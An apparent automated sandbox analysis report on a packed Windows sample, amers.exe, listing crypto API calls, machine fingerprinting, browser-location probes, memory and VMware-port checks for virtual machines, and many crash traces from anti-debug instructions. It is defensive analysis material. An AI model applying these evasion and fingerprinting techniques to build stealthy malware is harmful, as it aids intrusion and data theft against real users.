CryptExportKey May 31, 2024, 7:29 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x003f6160 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 31, 2024, 7:29 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x003f6160 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 31, 2024, 7:29 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x003f6160 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 31, 2024, 7:29 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x003f61e0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 31, 2024, 7:29 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x003f61e0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 31, 2024, 7:29 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x003f60e0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 31, 2024, 7:29 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x003f60e0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 31, 2024, 7:29 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x003f60e0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 31, 2024, 7:29 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x003f60e0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 31, 2024, 7:29 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x003f60e0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 31, 2024, 7:29 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x003f68a0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 31, 2024, 7:29 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x003f68a0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 31, 2024, 7:29 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x003f6a60 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 31, 2024, 7:31 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x003f66e0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 31, 2024, 7:31 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x003f66e0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 31, 2024, 7:31 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x003f6420 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 31, 2024, 7:33 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x0000000000282100 flags: 0 crypto_export_handle: 0x0000000000000000 blob_type: 8	1	1
CryptExportKey May 31, 2024, 7:33 a.m.	buffer: f R¦`Ùv¸ à.5;ø<þc ¬×Ù crypto_handle: 0x0000000000282100 flags: 0 crypto_export_handle: 0x0000000000000000 blob_type: 8	1	1
CryptExportKey May 31, 2024, 7:33 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x0000000000282100 flags: 0 crypto_export_handle: 0x0000000000000000 blob_type: 8	1	1
CryptExportKey May 31, 2024, 7:33 a.m.	buffer: f R¦`Ùv¸ à.5;ø<þc ¬×Ù crypto_handle: 0x0000000000282100 flags: 0 crypto_export_handle: 0x0000000000000000 blob_type: 8	1	1
CryptExportKey May 31, 2024, 7:33 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x0000000000282100 flags: 0 crypto_export_handle: 0x0000000000000000 blob_type: 6	1	1
CryptExportKey May 31, 2024, 7:33 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00000000002823a0 flags: 0 crypto_export_handle: 0x0000000000000000 blob_type: 6	1	1
CryptExportKey May 31, 2024, 7:33 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00000000002823a0 flags: 0 crypto_export_handle: 0x0000000000000000 blob_type: 6	1	1
CryptExportKey May 31, 2024, 7:33 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00000000002eea60 flags: 0 crypto_export_handle: 0x0000000000000000 blob_type: 6	1	1
CryptExportKey May 31, 2024, 7:33 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x000000001b15d200 flags: 0 crypto_export_handle: 0x0000000000000000 blob_type: 6	1	1
CryptExportKey May 31, 2024, 7:33 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x000000001b15d200 flags: 0 crypto_export_handle: 0x0000000000000000 blob_type: 6	1	1
CryptExportKey May 31, 2024, 7:33 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x000000001b15d200 flags: 0 crypto_export_handle: 0x0000000000000000 blob_type: 6	1	1
CryptExportKey May 31, 2024, 7:33 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x000000001b17aa30 flags: 0 crypto_export_handle: 0x0000000000000000 blob_type: 6	1	1
CryptExportKey May 31, 2024, 7:33 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x000000001b17aa30 flags: 0 crypto_export_handle: 0x0000000000000000 blob_type: 6	1	1
CryptExportKey May 31, 2024, 7:33 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x000000001b17a9c0 flags: 0 crypto_export_handle: 0x0000000000000000 blob_type: 6	1	1
CryptExportKey May 31, 2024, 7:33 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x000000001b17a9c0 flags: 0 crypto_export_handle: 0x0000000000000000 blob_type: 6	1	1
CryptExportKey May 31, 2024, 7:33 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x000000001b17a9c0 flags: 0 crypto_export_handle: 0x0000000000000000 blob_type: 6	1	1
CryptExportKey May 31, 2024, 7:33 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x000000001b17a9c0 flags: 0 crypto_export_handle: 0x0000000000000000 blob_type: 6	1	1
CryptExportKey May 31, 2024, 7:33 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x000000001b17ad40 flags: 0 crypto_export_handle: 0x0000000000000000 blob_type: 6	1	1
CryptExportKey May 31, 2024, 7:33 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x000000001b17ad40 flags: 0 crypto_export_handle: 0x0000000000000000 blob_type: 6	1	1
CryptExportKey May 31, 2024, 7:33 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x000000001b17ad40 flags: 0 crypto_export_handle: 0x0000000000000000 blob_type: 6	1	1
CryptExportKey May 31, 2024, 7:33 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x000000001b15ce10 flags: 0 crypto_export_handle: 0x0000000000000000 blob_type: 6	1	1
CryptExportKey May 31, 2024, 7:33 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x000000001b15ce10 flags: 0 crypto_export_handle: 0x0000000000000000 blob_type: 6	1	1
CryptExportKey May 31, 2024, 7:33 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x000000001b15ce10 flags: 0 crypto_export_handle: 0x0000000000000000 blob_type: 6	1	1
CryptExportKey May 31, 2024, 7:33 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x000000001b15d4a0 flags: 0 crypto_export_handle: 0x0000000000000000 blob_type: 6	1	1
CryptExportKey May 31, 2024, 7:33 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x000000001b15d4a0 flags: 0 crypto_export_handle: 0x0000000000000000 blob_type: 6	1	1
CryptExportKey May 31, 2024, 7:33 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x000000001b15d4a0 flags: 0 crypto_export_handle: 0x0000000000000000 blob_type: 6	1	1
CryptExportKey May 31, 2024, 7:33 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x000000001b15d4a0 flags: 0 crypto_export_handle: 0x0000000000000000 blob_type: 6	1	1
CryptExportKey May 31, 2024, 7:33 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x000000001b15d4a0 flags: 0 crypto_export_handle: 0x0000000000000000 blob_type: 6	1	1
CryptExportKey May 31, 2024, 7:33 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x000000001b15d4a0 flags: 0 crypto_export_handle: 0x0000000000000000 blob_type: 6	1	1
CryptExportKey May 31, 2024, 7:33 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x000000001b15d4a0 flags: 0 crypto_export_handle: 0x0000000000000000 blob_type: 6	1	1
CryptExportKey May 31, 2024, 7:33 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x000000001b15d4a0 flags: 0 crypto_export_handle: 0x0000000000000000 blob_type: 6	1	1
CryptExportKey May 31, 2024, 7:33 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x000000001b17b280 flags: 0 crypto_export_handle: 0x0000000000000000 blob_type: 6	1	1
CryptExportKey May 31, 2024, 7:33 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x000000001b17b280 flags: 0 crypto_export_handle: 0x0000000000000000 blob_type: 6	1	1

Collects information to fingerprint the system (MachineGuid, DigitalProductId, SystemBiosDate) (1 event)

registry

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\MachineGuid

Tries to locate where the browsers are installed (3 events)

file	C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
file	c:\program files\mozilla firefox\firefox.exe
registry	HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\Google Chrome

Checks amount of memory in system, this can be used to detect virtual machines that have a low amount of memory available (1 event)

Time & API	Arguments	Status	Return	Repeated
GlobalMemoryStatusEx May 31, 2024, 7:29 a.m.		1	1	0

The executable contains unknown PE section names indicative of a packer (could be a false positive) (6 events)

section	\x00
section	.idata
section
section	epnjyyts
section	llwtnlzz
section	.taggant

One or more processes crashed (50 out of 275 events)

Time & API	Arguments	Status
__exception__ May 31, 2024, 7:29 a.m.	stacktrace: RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x778d9ed2 RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x778d9ea5 exception.instruction_r: fb e9 4e 01 00 00 60 8b 74 24 24 8b 7c 24 28 fc exception.symbol: amers+0x31d0b9 exception.instruction: sti exception.module: amers.exe exception.exception_code: 0xc0000096 exception.offset: 3264697 exception.address: 0x151d0b9 registers.esp: 2685404 registers.edi: 0 registers.eax: 1 registers.ebp: 2685420 registers.edx: 23875584 registers.ebx: 2130567168 registers.esi: 0 registers.ecx: 0	1
__exception__ May 31, 2024, 7:29 a.m.	stacktrace: exception.instruction_r: fb 68 99 e1 75 2e 89 34 24 c7 04 24 80 dc 9f 7f exception.symbol: amers+0x6b2e0 exception.instruction: sti exception.module: amers.exe exception.exception_code: 0xc0000096 exception.offset: 439008 exception.address: 0x126b2e0 registers.esp: 2685372 registers.edi: 1971192040 registers.eax: 27549 registers.ebp: 4009332756 registers.edx: 18874368 registers.ebx: 19339545 registers.esi: 3 registers.ecx: 1971388416	1
__exception__ May 31, 2024, 7:29 a.m.	stacktrace: exception.instruction_r: fb e9 49 00 00 00 89 34 24 e9 24 01 00 00 50 c7 exception.symbol: amers+0x6b27a exception.instruction: sti exception.module: amers.exe exception.exception_code: 0xc0000096 exception.offset: 438906 exception.address: 0x126b27a registers.esp: 2685372 registers.edi: 233705 registers.eax: 4294942192 registers.ebp: 4009332756 registers.edx: 18874368 registers.ebx: 19339545 registers.esi: 3 registers.ecx: 1971388416	1
__exception__ May 31, 2024, 7:29 a.m.	stacktrace: exception.instruction_r: fb 68 ba f9 ea 26 e9 3c f9 ff ff 52 ba 04 00 00 exception.symbol: amers+0x6c30c exception.instruction: sti exception.module: amers.exe exception.exception_code: 0xc0000096 exception.offset: 443148 exception.address: 0x126c30c registers.esp: 2685372 registers.edi: 233705 registers.eax: 30045 registers.ebp: 4009332756 registers.edx: 18874368 registers.ebx: 19345810 registers.esi: 4294939932 registers.ecx: 1259	1
__exception__ May 31, 2024, 7:29 a.m.	stacktrace: exception.instruction_r: fb 52 ba e0 99 ff 6d e9 f8 fa ff ff 81 f2 61 e1 exception.symbol: amers+0x1ec8b8 exception.instruction: sti exception.module: amers.exe exception.exception_code: 0xc0000096 exception.offset: 2017464 exception.address: 0x13ec8b8 registers.esp: 2685368 registers.edi: 19350475 registers.eax: 30094 registers.ebp: 4009332756 registers.edx: 2130566132 registers.ebx: 20888960 registers.esi: 20872290 registers.ecx: 15	1
__exception__ May 31, 2024, 7:29 a.m.	stacktrace: exception.instruction_r: fb 68 3e c1 78 08 89 34 24 e9 ae ff ff ff 87 2c exception.symbol: amers+0x1eca10 exception.instruction: sti exception.module: amers.exe exception.exception_code: 0xc0000096 exception.offset: 2017808 exception.address: 0x13eca10 registers.esp: 2685372 registers.edi: 19350475 registers.eax: 30094 registers.ebp: 4009332756 registers.edx: 2130566132 registers.ebx: 20919054 registers.esi: 20872290 registers.ecx: 15	1
__exception__ May 31, 2024, 7:29 a.m.	stacktrace: exception.instruction_r: fb b9 a5 33 e5 74 53 bb 01 00 00 00 01 d9 5b 83 exception.symbol: amers+0x1ebe8f exception.instruction: sti exception.module: amers.exe exception.exception_code: 0xc0000096 exception.offset: 2014863 exception.address: 0x13ebe8f registers.esp: 2685372 registers.edi: 0 registers.eax: 30094 registers.ebp: 4009332756 registers.edx: 175593 registers.ebx: 20892246 registers.esi: 20872290 registers.ecx: 15	1
__exception__ May 31, 2024, 7:29 a.m.	stacktrace: exception.instruction_r: fb 51 89 34 24 68 74 04 b7 3a 8b 34 24 83 c4 04 exception.symbol: amers+0x1ed98f exception.instruction: sti exception.module: amers.exe exception.exception_code: 0xc0000096 exception.offset: 2021775 exception.address: 0x13ed98f registers.esp: 2685368 registers.edi: 0 registers.eax: 29599 registers.ebp: 4009332756 registers.edx: 175593 registers.ebx: 20895734 registers.esi: 20872290 registers.ecx: 1274735116	1
__exception__ May 31, 2024, 7:29 a.m.	stacktrace: exception.instruction_r: fb 51 89 e1 53 bb 26 eb 65 37 81 cb 61 dd df 2f exception.symbol: amers+0x1edee3 exception.instruction: sti exception.module: amers.exe exception.exception_code: 0xc0000096 exception.offset: 2023139 exception.address: 0x13edee3 registers.esp: 2685372 registers.edi: 0 registers.eax: 29599 registers.ebp: 4009332756 registers.edx: 175593 registers.ebx: 20925333 registers.esi: 20872290 registers.ecx: 1274735116	1
__exception__ May 31, 2024, 7:29 a.m.	stacktrace: exception.instruction_r: fb 52 89 3c 24 bf 6d cd e0 7f 81 cf e2 08 d3 5e exception.symbol: amers+0x1ee13e exception.instruction: sti exception.module: amers.exe exception.exception_code: 0xc0000096 exception.offset: 2023742 exception.address: 0x13ee13e registers.esp: 2685372 registers.edi: 1549541099 registers.eax: 29599 registers.ebp: 4009332756 registers.edx: 175593 registers.ebx: 20925333 registers.esi: 4294940520 registers.ecx: 1274735116	1
__exception__ May 31, 2024, 7:29 a.m.	stacktrace: exception.instruction_r: fb 83 ec 04 89 34 24 c7 04 24 9c 22 30 19 e9 09 exception.symbol: amers+0x1f58a0 exception.instruction: sti exception.module: amers.exe exception.exception_code: 0xc0000096 exception.offset: 2054304 exception.address: 0x13f58a0 registers.esp: 2685372 registers.edi: 20930829 registers.eax: 28067 registers.ebp: 4009332756 registers.edx: 1802207473 registers.ebx: 1114345 registers.esi: 1476395008 registers.ecx: 0	1
__exception__ May 31, 2024, 7:29 a.m.	stacktrace: exception.instruction_r: ed 64 8f 05 00 00 00 00 83 ec 04 e9 53 0f 00 00 exception.symbol: amers+0x1fbc91 exception.instruction: in eax, dx exception.module: amers.exe exception.exception_code: 0xc0000096 exception.offset: 2079889 exception.address: 0x13fbc91 registers.esp: 2685364 registers.edi: 20930829 registers.eax: 1447909480 registers.ebp: 4009332756 registers.edx: 22104 registers.ebx: 1971327157 registers.esi: 20934993 registers.ecx: 20	1
__exception__ May 31, 2024, 7:29 a.m.	stacktrace: exception.instruction_r: 0f 3f 07 0b 64 8f 05 00 00 00 00 83 c4 04 83 fb exception.symbol: amers+0x1fcca2 exception.address: 0x13fcca2 exception.module: amers.exe exception.exception_code: 0xc000001d exception.offset: 2084002 registers.esp: 2685364 registers.edi: 20930829 registers.eax: 1 registers.ebp: 4009332756 registers.edx: 22104 registers.ebx: 0 registers.esi: 20934993 registers.ecx: 20	1
__exception__ May 31, 2024, 7:29 a.m.	stacktrace: exception.instruction_r: ed 81 fb 68 58 4d 56 75 0a c7 85 5e 27 2d 12 01 exception.symbol: amers+0x1f8def exception.instruction: in eax, dx exception.module: amers.exe exception.exception_code: 0xc0000096 exception.offset: 2067951 exception.address: 0x13f8def registers.esp: 2685364 registers.edi: 20930829 registers.eax: 1447909480 registers.ebp: 4009332756 registers.edx: 22104 registers.ebx: 2256917605 registers.esi: 20934993 registers.ecx: 10	1
__exception__ May 31, 2024, 7:29 a.m.	stacktrace: exception.instruction_r: cd 01 eb 00 6a 00 57 e8 03 00 00 00 20 5f c3 5f exception.symbol: amers+0x1ffbab exception.instruction: int 1 exception.module: amers.exe exception.exception_code: 0xc0000005 exception.offset: 2096043 exception.address: 0x13ffbab registers.esp: 2685332 registers.edi: 0 registers.eax: 2685332 registers.ebp: 4009332756 registers.edx: 0 registers.ebx: 20970693 registers.esi: 1606749173 registers.ecx: 2130516789	1
__exception__ May 31, 2024, 7:29 a.m.	stacktrace: exception.instruction_r: fb 68 09 00 9d 11 89 14 24 ba b5 91 5b 1b e9 5a exception.symbol: amers+0x1ffff9 exception.instruction: sti exception.module: amers.exe exception.exception_code: 0xc0000096 exception.offset: 2097145 exception.address: 0x13ffff9 registers.esp: 2685372 registers.edi: 21000685 registers.eax: 29246 registers.ebp: 4009332756 registers.edx: 2283 registers.ebx: 40918640 registers.esi: 4294940876 registers.ecx: 1596456960	1
__exception__ May 31, 2024, 7:29 a.m.	stacktrace: exception.instruction_r: fb 68 ab ff e6 3a e9 49 00 00 00 ba 3f 8b c0 6f exception.symbol: amers+0x20f469 exception.instruction: sti exception.module: amers.exe exception.exception_code: 0xc0000096 exception.offset: 2159721 exception.address: 0x140f469 registers.esp: 2685368 registers.edi: 19308726 registers.eax: 31392 registers.ebp: 4009332756 registers.edx: 6 registers.ebx: 21034005 registers.esi: 1971262480 registers.ecx: 0	1
__exception__ May 31, 2024, 7:29 a.m.	stacktrace: exception.instruction_r: fb 53 89 04 24 c7 04 24 a1 98 e0 5d c1 2c 24 02 exception.symbol: amers+0x20fb8d exception.instruction: sti exception.module: amers.exe exception.exception_code: 0xc0000096 exception.offset: 2161549 exception.address: 0x140fb8d registers.esp: 2685372 registers.edi: 19308726 registers.eax: 31392 registers.ebp: 4009332756 registers.edx: 6 registers.ebx: 21065397 registers.esi: 1971262480 registers.ecx: 0	1
__exception__ May 31, 2024, 7:29 a.m.	stacktrace: exception.instruction_r: fb 81 ec 04 00 00 00 89 1c 24 bb 76 3d ef 6d e9 exception.symbol: amers+0x20f716 exception.instruction: sti exception.module: amers.exe exception.exception_code: 0xc0000096 exception.offset: 2160406 exception.address: 0x140f716 registers.esp: 2685372 registers.edi: 19308726 registers.eax: 262633 registers.ebp: 4009332756 registers.edx: 6 registers.ebx: 21065397 registers.esi: 1971262480 registers.ecx: 4294939004	1
__exception__ May 31, 2024, 7:29 a.m.	stacktrace: exception.instruction_r: fb 50 e9 d1 fa ff ff 81 f2 87 b3 7e 6f 42 42 e9 exception.symbol: amers+0x2135bc exception.instruction: sti exception.module: amers.exe exception.exception_code: 0xc0000096 exception.offset: 2176444 exception.address: 0x14135bc registers.esp: 2685360 registers.edi: 19308726 registers.eax: 29795 registers.ebp: 4009332756 registers.edx: 1694094462 registers.ebx: 21065397 registers.esi: 21049028 registers.ecx: 302928194	1
__exception__ May 31, 2024, 7:29 a.m.	stacktrace: exception.instruction_r: fb e9 2c 01 00 00 bb 6d 89 14 0c e9 bb fb ff ff exception.symbol: amers+0x2135e7 exception.instruction: sti exception.module: amers.exe exception.exception_code: 0xc0000096 exception.offset: 2176487 exception.address: 0x14135e7 registers.esp: 2685364 registers.edi: 19308726 registers.eax: 29795 registers.ebp: 4009332756 registers.edx: 1694094462 registers.ebx: 21065397 registers.esi: 21078823 registers.ecx: 302928194	1
__exception__ May 31, 2024, 7:29 a.m.	stacktrace: exception.instruction_r: fb 68 7a 07 8a 12 89 04 24 56 e9 03 02 00 00 31 exception.symbol: amers+0x21343e exception.instruction: sti exception.module: amers.exe exception.exception_code: 0xc0000096 exception.offset: 2176062 exception.address: 0x141343e registers.esp: 2685364 registers.edi: 19308726 registers.eax: 0 registers.ebp: 4009332756 registers.edx: 1694094462 registers.ebx: 21065397 registers.esi: 21052359 registers.ecx: 604292944	1
__exception__ May 31, 2024, 7:29 a.m.	stacktrace: exception.instruction_r: fb e9 0a 01 00 00 33 0c 24 31 0c 24 33 0c 24 8b exception.symbol: amers+0x214161 exception.instruction: sti exception.module: amers.exe exception.exception_code: 0xc0000096 exception.offset: 2179425 exception.address: 0x1414161 registers.esp: 2685360 registers.edi: 19308726 registers.eax: 26208 registers.ebp: 4009332756 registers.edx: 21052706 registers.ebx: 21065397 registers.esi: 21052359 registers.ecx: 1639055933	1
__exception__ May 31, 2024, 7:29 a.m.	stacktrace: exception.instruction_r: fb 55 e9 00 00 00 00 89 3c 24 89 2c 24 bd 37 95 exception.symbol: amers+0x214306 exception.instruction: sti exception.module: amers.exe exception.exception_code: 0xc0000096 exception.offset: 2179846 exception.address: 0x1414306 registers.esp: 2685364 registers.edi: 19308726 registers.eax: 4294943868 registers.ebp: 4009332756 registers.edx: 21078914 registers.ebx: 604292944 registers.esi: 21052359 registers.ecx: 1639055933	1
__exception__ May 31, 2024, 7:29 a.m.	stacktrace: exception.instruction_r: fb 51 81 ec 04 00 00 00 89 14 24 c7 04 24 ee 7f exception.symbol: amers+0x21797f exception.instruction: sti exception.module: amers.exe exception.exception_code: 0xc0000096 exception.offset: 2193791 exception.address: 0x141797f registers.esp: 2685364 registers.edi: 21070383 registers.eax: 29154 registers.ebp: 4009332756 registers.edx: 732403449 registers.ebx: 593201521 registers.esi: 0 registers.ecx: 664301416	1
__exception__ May 31, 2024, 7:29 a.m.	stacktrace: exception.instruction_r: fb 68 38 9b d0 54 89 14 24 e9 00 00 00 00 55 bd exception.symbol: amers+0x2366d3 exception.instruction: sti exception.module: amers.exe exception.exception_code: 0xc0000096 exception.offset: 2320083 exception.address: 0x14366d3 registers.esp: 2685332 registers.edi: 756777908 registers.eax: 32950 registers.ebp: 4009332756 registers.edx: 2130566132 registers.ebx: 21224524 registers.esi: 21187211 registers.ecx: 1596456960	1
__exception__ May 31, 2024, 7:29 a.m.	stacktrace: exception.instruction_r: fb 51 89 3c 24 50 56 89 0c 24 b9 36 2e 1d 68 89 exception.symbol: amers+0x236550 exception.instruction: sti exception.module: amers.exe exception.exception_code: 0xc0000096 exception.offset: 2319696 exception.address: 0x1436550 registers.esp: 2685332 registers.edi: 756777908 registers.eax: 116969 registers.ebp: 4009332756 registers.edx: 2130566132 registers.ebx: 21194960 registers.esi: 0 registers.ecx: 1596456960	1
__exception__ May 31, 2024, 7:29 a.m.	stacktrace: exception.instruction_r: fb 83 ec 04 89 0c 24 83 ec 04 89 04 24 b8 db 71 exception.symbol: amers+0x23764d exception.instruction: sti exception.module: amers.exe exception.exception_code: 0xc0000096 exception.offset: 2324045 exception.address: 0x143764d registers.esp: 2685328 registers.edi: 756777908 registers.eax: 30261 registers.ebp: 4009332756 registers.edx: 1053455415 registers.ebx: 21194960 registers.esi: 21198347 registers.ecx: 902452806	1
__exception__ May 31, 2024, 7:29 a.m.	stacktrace: exception.instruction_r: fb 55 68 86 a8 2f 6e 5d 81 ec 04 00 00 00 89 2c exception.symbol: amers+0x237b34 exception.instruction: sti exception.module: amers.exe exception.exception_code: 0xc0000096 exception.offset: 2325300 exception.address: 0x1437b34 registers.esp: 2685332 registers.edi: 756777908 registers.eax: 4294939480 registers.ebp: 4009332756 registers.edx: 1053455415 registers.ebx: 3109114711 registers.esi: 21228608 registers.ecx: 902452806	1
__exception__ May 31, 2024, 7:29 a.m.	stacktrace: exception.instruction_r: fb e9 6f 00 00 00 57 89 e7 81 c7 04 00 00 00 e9 exception.symbol: amers+0x2386a1 exception.instruction: sti exception.module: amers.exe exception.exception_code: 0xc0000096 exception.offset: 2328225 exception.address: 0x14386a1 registers.esp: 2685328 registers.edi: 756777908 registers.eax: 32143 registers.ebp: 4009332756 registers.edx: 1053455415 registers.ebx: 1357435570 registers.esi: 21228608 registers.ecx: 21201189	1
__exception__ May 31, 2024, 7:29 a.m.	stacktrace: exception.instruction_r: fb e9 99 fe ff ff 53 c7 04 24 b1 9d 50 29 89 1c exception.symbol: amers+0x23829e exception.instruction: sti exception.module: amers.exe exception.exception_code: 0xc0000096 exception.offset: 2327198 exception.address: 0x143829e registers.esp: 2685332 registers.edi: 756777908 registers.eax: 32143 registers.ebp: 4009332756 registers.edx: 1053455415 registers.ebx: 1357435570 registers.esi: 21228608 registers.ecx: 21233332	1
__exception__ May 31, 2024, 7:29 a.m.	stacktrace: exception.instruction_r: fb 51 89 34 24 e9 3e 03 00 00 59 e9 a6 ff ff ff exception.symbol: amers+0x238621 exception.instruction: sti exception.module: amers.exe exception.exception_code: 0xc0000096 exception.offset: 2328097 exception.address: 0x1438621 registers.esp: 2685332 registers.edi: 756777908 registers.eax: 32143 registers.ebp: 4009332756 registers.edx: 2794241888 registers.ebx: 1357435570 registers.esi: 4294937996 registers.ecx: 21233332	1
__exception__ May 31, 2024, 7:29 a.m.	stacktrace: exception.instruction_r: fb 52 e9 20 08 00 00 33 04 24 8b 24 24 56 89 e6 exception.symbol: amers+0x23915f exception.instruction: sti exception.module: amers.exe exception.exception_code: 0xc0000096 exception.offset: 2330975 exception.address: 0x143915f registers.esp: 2685332 registers.edi: 21204839 registers.eax: 5564759 registers.ebp: 4009332756 registers.edx: 2975014607 registers.ebx: 1357435570 registers.esi: 4294939080 registers.ecx: 21236123	1
__exception__ May 31, 2024, 7:29 a.m.	stacktrace: exception.instruction_r: fb e9 30 00 00 00 87 1c 24 5c 50 89 1c 24 bb 7b exception.symbol: amers+0x239fd8 exception.instruction: sti exception.module: amers.exe exception.exception_code: 0xc0000096 exception.offset: 2334680 exception.address: 0x1439fd8 registers.esp: 2685332 registers.edi: 21204839 registers.eax: 28416 registers.ebp: 4009332756 registers.edx: 21236773 registers.ebx: 1357435570 registers.esi: 4294939080 registers.ecx: 21236123	1
__exception__ May 31, 2024, 7:29 a.m.	stacktrace: exception.instruction_r: fb 50 68 17 bd 18 37 e9 53 ff ff ff 56 89 14 24 exception.symbol: amers+0x23a409 exception.instruction: sti exception.module: amers.exe exception.exception_code: 0xc0000096 exception.offset: 2335753 exception.address: 0x143a409 registers.esp: 2685332 registers.edi: 21204839 registers.eax: 28416 registers.ebp: 4009332756 registers.edx: 21211429 registers.ebx: 1418054760 registers.esi: 4294939080 registers.ecx: 0	1
__exception__ May 31, 2024, 7:29 a.m.	stacktrace: exception.instruction_r: fb 57 89 0c 24 e9 2b 00 00 00 b8 f9 26 1b 61 48 exception.symbol: amers+0x241eb1 exception.instruction: sti exception.module: amers.exe exception.exception_code: 0xc0000096 exception.offset: 2367153 exception.address: 0x1441eb1 registers.esp: 2685332 registers.edi: 4021952371 registers.eax: 29812 registers.ebp: 4009332756 registers.edx: 21269526 registers.ebx: 4294940528 registers.esi: 604801367 registers.ecx: 1969225870	1
__exception__ May 31, 2024, 7:29 a.m.	stacktrace: exception.instruction_r: fb 57 57 e9 09 f7 ff ff 81 34 24 00 3f eb 7f 68 exception.symbol: amers+0x24300c exception.instruction: sti exception.module: amers.exe exception.exception_code: 0xc0000096 exception.offset: 2371596 exception.address: 0x144300c registers.esp: 2685332 registers.edi: 3939837675 registers.eax: 30166 registers.ebp: 4009332756 registers.edx: 1988730215 registers.ebx: 21273295 registers.esi: 4294940448 registers.ecx: 634055792	1
__exception__ May 31, 2024, 7:29 a.m.	stacktrace: exception.instruction_r: fb 51 89 3c 24 bf 41 3f 7f 7b 56 be 17 af d7 6d exception.symbol: amers+0x243ee7 exception.instruction: sti exception.module: amers.exe exception.exception_code: 0xc0000096 exception.offset: 2375399 exception.address: 0x1443ee7 registers.esp: 2685328 registers.edi: 21247251 registers.eax: 29059 registers.ebp: 4009332756 registers.edx: 1917232388 registers.ebx: 21247916 registers.esi: 13257 registers.ecx: 29184	1
__exception__ May 31, 2024, 7:29 a.m.	stacktrace: exception.instruction_r: fb 31 ff e9 85 06 00 00 5c e9 15 04 00 00 5e 01 exception.symbol: amers+0x243a29 exception.instruction: sti exception.module: amers.exe exception.exception_code: 0xc0000096 exception.offset: 2374185 exception.address: 0x1443a29 registers.esp: 2685332 registers.edi: 21247251 registers.eax: 29059 registers.ebp: 4009332756 registers.edx: 1917232388 registers.ebx: 21276975 registers.esi: 13257 registers.ecx: 29184	1
__exception__ May 31, 2024, 7:29 a.m.	stacktrace: exception.instruction_r: fb 68 90 a0 43 6e 89 04 24 68 27 e7 61 68 e9 4f exception.symbol: amers+0x243e59 exception.instruction: sti exception.module: amers.exe exception.exception_code: 0xc0000096 exception.offset: 2375257 exception.address: 0x1443e59 registers.esp: 2685332 registers.edi: 4294941016 registers.eax: 157417 registers.ebp: 4009332756 registers.edx: 1917232388 registers.ebx: 21276975 registers.esi: 13257 registers.ecx: 29184	1
